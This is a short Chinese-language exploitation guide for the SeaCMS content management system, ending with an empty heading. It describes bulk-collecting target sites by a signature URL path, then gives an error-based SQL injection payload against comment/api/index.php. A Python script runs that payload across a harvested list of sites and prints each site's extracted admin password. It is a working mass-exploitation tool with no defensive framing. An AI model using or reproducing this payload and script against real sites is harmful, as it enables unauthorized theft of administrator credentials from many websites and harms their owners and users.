海洋seacms漏洞利用

0x001-url采集
通过对海洋cms源码研究，找出含有标志性的网站目录（search.php?searchtype=），然后利用url采集工具批量采集seacms网站

0x002-漏洞payload
payload：/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27

0x003-exp制作

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("该url存在漏洞："+url)
            print(re.search(pattern,html).group(1))
    except Exception as e:
        pass

0x004-exp的使用效果*